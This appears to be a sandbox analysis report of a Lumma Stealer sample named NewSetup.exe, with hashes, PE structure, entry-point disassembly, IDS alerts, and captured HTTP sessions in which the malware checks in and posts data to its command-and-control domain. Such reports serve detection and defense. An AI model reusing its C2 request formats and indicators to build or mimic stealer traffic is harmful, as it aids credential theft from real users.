CLOUDFLARENETUS | https://cbhc9.anguatiab.ru/RpweC/ | malicious | Unknown | 1.1.1.1

Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | ForcesLangi.exe | malicious | LummaC | 172.67.157.249
a0e9f5d64349fb13191bc781f81f42e1 | iviewers.dll | malicious | LummaC | 172.67.157.249
a0e9f5d64349fb13191bc781f81f42e1 | launcher.exe | malicious | LummaC | 172.67.157.249
a0e9f5d64349fb13191bc781f81f42e1 | Leside-.exe | malicious | LummaC | 172.67.157.249
a0e9f5d64349fb13191bc781f81f42e1 | search.hta | malicious | Unknown | 172.67.157.249
a0e9f5d64349fb13191bc781f81f42e1 | SET_UP.exe | malicious | LummaC | 172.67.157.249
a0e9f5d64349fb13191bc781f81f42e1 | !Setup.exe | malicious | LummaC Stealer | 172.67.157.249
a0e9f5d64349fb13191bc781f81f42e1 | @Setup.exe | malicious | LummaC | 172.67.157.249
a0e9f5d64349fb13191bc781f81f42e1 | Full_Setup.exe | malicious | LummaC Stealer | 172.67.157.249
a0e9f5d64349fb13191bc781f81f42e1 | Solara.exe | malicious | LummaC | 172.67.157.249

No context
Process: C:\Users\user\Desktop\NewSetup.exe
File Type: assembler source, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 14402
Entropy (8bit): 4.874636730022465
Encrypted: false
SSDEEP: 384:vlICCmV5fTMzsM3qlICCmV5fTMzsM3ip9guFx2rBhiLfmfU:vGCC+dMOGCC+dMY9guFx2rBo
MD5: DF0EFD0545733561C6E165770FB3661C
SHA1: 0F3AD477176CF235C6C59EE2EB15D81DCB6178A8
SHA-256: A434B406E97A2C892FA88C3975D8181EBEA62A8DA919C5221409E425DF50FD17
SHA-512: 3FF527435BC8BCF2640E0B64725CC0DB8A801D912698D4D94C44200529268B80AA7B59A2E2A2EA6C4621E09AA249AAA3583A8D90E4F5D7B68E0E6FFFEB759918
Malicious: false
Reputation: low
Preview: AcquireSRWLockExclusive..AcquireSRWLockShared..ActivateActCtx..ActivateActCtxWorker..AddAtomA..AddAtomW..AddConsoleAliasA..AddConsoleAliasW..AddDllDirectory..AddIntegrityLabelToBoundaryDescriptor..AddLocalAlternateComputerNameA..AddLocalAlternateComputerNameW..AddRefActCtx..AddRefActCtxWorker..AddResourceAttributeAce..AddSIDToBoundaryDescriptor..AddScopedPolicyIDAce..AddSecureMemoryCacheCallback..AddVectoredContinueHandler..AddVectoredExceptionHandler..AdjustCalendarDate..AllocConsole..AllocateUserPhysicalPages..AllocateUserPhysicalPagesNuma..AppPolicyGetClrCompat..AppPolicyGetCreateFileAccess..AppPolicyGetLifecycleManagement..AppPolicyGetMediaFoundationCodecLoading..AppPolicyGetProcessTerminationMethod..AppPolicyGetShowDeveloperDiagnostic..AppPolicyGetThreadInitializationType..AppPolicyGetWindowingModel..AppXGetOSMaxVersionTested..ApplicationRecoveryFinished..ApplicationRecoveryInProgress..AreFileApisANSI..AssignProcessToJobObject..AttachConsole..BackupRead..BackupSeek..BackupWrite..B
File type: PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit): 7.567180187346395
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: NewSetup.exe
File size: 569'384 bytes
MD5: e8c9377a0dddc131e2291c3d7f4d69ed
SHA1: c82b6d704cf41a98df3dd576a3a75093d89f0637
SHA256: 4e88703d3aafd146935f551706c7691c36cb34efd05d874c8ea0d49933702446
SHA512: 73b1a25e238cea527fc86836f3f550ed9947a24dac39b778ec4af2be755f63ff165a71f30dea8ba6ad63a77fb6a09d72af9ec13a622f80d0a1afbeaa53e21d70
SSDEEP: 12288:pYO6Dqzihouxpa+yWZ+QDKn5zXex8moYjG60VsZy/zQpYBqEO:uO6DThou2+y6b0o8moYy6SsZybiMqt
TLSH: 8EC4E0423691C4B3C95315769AB9D779493EBC200F615ACB93A80BFECEB02C15F31A5E
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ng..........................................@.......................................@.................................|j..<..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x4104a0
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp: 0x676E98E6 [Fri Dec 27 12:09:10 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 96d90e8808da099bc17e050394f447e7
Signature Valid: false
Signature Issuer: CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After:
• 12/01/2023 19:00:00 16/01/2026 18:59:59
Subject Chain:
• CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version: 3
Thumbprint MD5: 5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1: 15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256: 28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial: 0997C56CAA59055394D9A9CDB8BEEB56
                                                                                                    Instruction
                                                                                                    call 00007F02288C718Ah
                                                                                                    jmp 00007F02288C6FEDh
                                                                                                    mov ecx, dword ptr [0043B680h]
                                                                                                    push esi
                                                                                                    push edi
                                                                                                    mov edi, BB40E64Eh
                                                                                                    mov esi, FFFF0000h
                                                                                                    cmp ecx, edi
                                                                                                    je 00007F02288C7186h
                                                                                                    test esi, ecx
                                                                                                    jne 00007F02288C71A8h
                                                                                                    call 00007F02288C71B1h
                                                                                                    mov ecx, eax
                                                                                                    cmp ecx, edi
                                                                                                    jne 00007F02288C7189h
                                                                                                    mov ecx, BB40E64Fh
                                                                                                    jmp 00007F02288C7190h
                                                                                                    test esi, ecx
                                                                                                    jne 00007F02288C718Ch
                                                                                                    or eax, 00004711h
                                                                                                    shl eax, 10h
                                                                                                    or ecx, eax
                                                                                                    mov dword ptr [0043B680h], ecx
                                                                                                    not ecx
                                                                                                    pop edi
                                                                                                    mov dword ptr [0043B6C0h], ecx
                                                                                                    pop esi
                                                                                                    ret
                                                                                                    push ebp
                                                                                                    mov ebp, esp
                                                                                                    sub esp, 14h
                                                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                                                    xorps xmm0, xmm0
                                                                                                    push eax
                                                                                                    movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                    call dword ptr [00436D00h]
                                                                                                    mov eax, dword ptr [ebp-08h]
                                                                                                    xor eax, dword ptr [ebp-0Ch]
                                                                                                    mov dword ptr [ebp-04h], eax
                                                                                                    call dword ptr [00436CB8h]
                                                                                                    xor dword ptr [ebp-04h], eax
                                                                                                    call dword ptr [00436CB4h]
                                                                                                    xor dword ptr [ebp-04h], eax
                                                                                                    lea eax, dword ptr [ebp-14h]
                                                                                                    push eax
                                                                                                    call dword ptr [00436D50h]
                                                                                                    mov eax, dword ptr [ebp-10h]
                                                                                                    lea ecx, dword ptr [ebp-04h]
                                                                                                    xor eax, dword ptr [ebp-14h]
                                                                                                    xor eax, dword ptr [ebp-04h]
                                                                                                    xor eax, ecx
                                                                                                    leave
                                                                                                    ret
                                                                                                    mov eax, 00004000h
                                                                                                    ret
                                                                                                    push 0043CF48h
                                                                                                    call dword ptr [00436D28h]
                                                                                                    ret
                                                                                                    push 00030000h
                                                                                                    push 00010000h
                                                                                                    push 00000000h
                                                                                                    call 00007F02288CDF63h
                                                                                                    add esp, 0Ch
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x36a7c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8e000 | 0x3fc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x88a00 | 0x2628 | .bss
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3f000 | 0x2744 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x32608 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2ea98 | 0xc0 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x36c3c | 0x184 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2b4ca | 0x2b600 | ebf84c6b836020b1a66433a898baeab7 | False | 0.5443702719740634 | data | 6.596404756541432 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2d000 | 0xc50c | 0xc600 | 96e76e7ef084461591b1dcd4c2131f05 | False | 0.40260022095959597 | data | 4.741850626178578 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3a000 | 0x3714 | 0x2800 | d87fd4546a2b39263a028b496b33108f | False | 0.29814453125 | data | 5.024681407682101 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x3e000 | 0x9 | 0x200 | 1f354d76203061bfdd5a53dae48d5435 | False | 0.033203125 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x3f000 | 0x2744 | 0x2800 | c7508b57e36483307c47b7dd73fc0c85 | False | 0.75166015625 | data | 6.531416896423856 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss | 0x42000 | 0x4b200 | 0x4b200 | cb4aaa4c7f2be185e5ab2b917b4bde00 | False | 1.0003282289933444 | data | 7.999414414182457 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x8e000 | 0x3fc | 0x400 | 4243bfa36d7c6187562be2edfa0b46c2 | False | 0.443359375 | data | 3.391431520369637 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x8e058 | 0x3a4 | data | English | United States | 0.44849785407725323
DLL | Import
KERNEL32.dll | AcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThread, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
USER32.dll | ShowWindow
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-27T22:39:57.639998+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49709 | 172.67.157.249 | 443 | TCP
2024-12-27T22:39:58.376516+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49709 | 172.67.157.249 | 443 | TCP
2024-12-27T22:39:58.376516+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49709 | 172.67.157.249 | 443 | TCP
2024-12-27T22:39:59.643972+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49710 | 172.67.157.249 | 443 | TCP
2024-12-27T22:40:00.414616+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.6 | 49710 | 172.67.157.249 | 443 | TCP
2024-12-27T22:40:00.414616+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49710 | 172.67.157.249 | 443 | TCP
2024-12-27T22:40:02.028641+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49711 | 172.67.157.249 | 443 | TCP
2024-12-27T22:40:03.154379+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49711 | 172.67.157.249 | 443 | TCP
2024-12-27T22:40:04.493219+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49713 | 172.67.157.249 | 443 | TCP
2024-12-27T22:40:06.968159+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49714 | 172.67.157.249 | 443 | TCP
2024-12-27T22:40:09.559896+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49724 | 172.67.157.249 | 443 | TCP
2024-12-27T22:40:13.103475+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49732 | 172.67.157.249 | 443 | TCP
2024-12-27T22:40:16.063147+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49743 | 172.67.157.249 | 443 | TCP
                                                                                                    Dec 27, 2024 22:40:05.661652088 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:05.661730051 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:05.661983967 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:05.661998987 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:06.967978001 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:06.968158960 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:06.969396114 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:06.969408989 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:06.969635010 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:06.971303940 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:06.971491098 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:06.971520901 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:06.971582890 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:06.971589088 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:07.928045988 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:07.928142071 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:07.928189993 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:07.928277016 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:07.928292990 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:08.297163963 CET49724443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:08.297198057 CET44349724172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:08.297262907 CET49724443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:08.297838926 CET49724443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:08.297868013 CET44349724172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:09.559804916 CET44349724172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:09.559895992 CET49724443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:09.561094999 CET49724443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:09.561110020 CET44349724172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:09.561316967 CET44349724172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:09.562509060 CET49724443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:09.562602997 CET49724443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:09.562608957 CET44349724172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:11.290412903 CET44349724172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:11.290668964 CET44349724172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:11.290734053 CET49724443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:11.290843964 CET49724443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:11.290862083 CET44349724172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:11.845419884 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:11.845539093 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:11.845638990 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:11.845902920 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:11.845940113 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.103359938 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.103475094 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.104660034 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.104692936 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.104938984 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.133054018 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.133783102 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.133837938 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.133977890 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.134013891 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.134500027 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.134547949 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.134728909 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.134792089 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.135279894 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.135339022 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.135566950 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.135610104 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.135637045 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.135665894 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.135833025 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.135890007 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.135937929 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.136126041 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.136171103 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.179372072 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.179693937 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.179775953 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.179817915 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.179845095 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.179920912 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.179956913 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.180005074 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.180021048 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:15.656842947 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:15.656945944 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:15.660073042 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:15.677378893 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:15.677408934 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:15.730690956 CET49743443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:15.730737925 CET44349743172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:15.730801105 CET49743443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:15.731154919 CET49743443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:15.731168032 CET44349743172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:16.063147068 CET49743443192.168.2.6172.67.157.249
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 22:39:56.139700890 CET | 53696 | 53 | 192.168.2.6 | 1.1.1.1
Dec 27, 2024 22:39:56.367433071 CET | 53 | 53696 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 22:39:56.139700890 CET | 192.168.2.6 | 1.1.1.1 | 0x86d | Standard query (0) | stingyerasjhru.click | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 22:39:56.367433071 CET | 1.1.1.1 | 192.168.2.6 | 0x86d | No error (0) | stingyerasjhru.click | | 172.67.157.249 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:39:56.367433071 CET | 1.1.1.1 | 192.168.2.6 | 0x86d | No error (0) | stingyerasjhru.click | | 104.21.58.80 | A (IP address) | IN (0x0001) | false
• stingyerasjhru.click
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49709 | 172.67.157.249 | 443 | 5680 | C:\Users\user\Desktop\NewSetup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 21:39:57 UTC | 267 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: stingyerasjhru.click
2024-12-27 21:39:57 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-27 21:39:58 UTC | 1137 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 21:39:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=hiavirq156lc2pp7nh7fk80rtu; expires=Tue, 22 Apr 2025 15:26:37 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F7qMe7P8wvYmwR1kw4D%2B86B1UoRgro3chN9ZAD9CdHHkstkZBh0nJehdhRNL%2B92QQz1PmJbnff%2BBcYZu99RMfCCeSD%2FLGY3MKwLFsHhbsYpTg1oU7Z5hVQ5anWAa%2FRDKf13bK9vhIA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8c775eecd5c32b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1511&min_rtt=1506&rtt_var=576&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2853&recv_bytes=911&delivery_rate=1881443&cwnd=224&unsent_bytes=0&cid=c0ece0bb62b6517f&ts=749&x=0"
2024-12-27 21:39:58 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-27 21:39:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49710 | 172.67.157.249 | 443 | 5680 | C:\Users\user\Desktop\NewSetup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 21:39:59 UTC | 268 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 52
Host: stingyerasjhru.click
2024-12-27 21:39:59 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 70 71 5a 6e 4b 50 2d 2d 62 57 39 76 62 6e 70 36 65 47 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=pqZnKP--bW9vbnp6eG&j=
2024-12-27 21:40:00 UTC | 1133 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 21:40:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=88ovts8mu0cmun4ehplahni4fj; expires=Tue, 22 Apr 2025 15:26:39 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dTdudavxNqWtc4F7YGs8BFV1cEOj%2BNZyh3AC2If7Dv8wE39PP6BeC14g7L9O1mxOgVVczuQtB6K6GLuT8nbDjIu5Do4dznbzL3Dn9C3dB25wyskF%2FSB%2BTuUX45jneScAITEUV6m1kw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8c776b89054401-EWR
alt-svc: h3=":443"; ma=86400
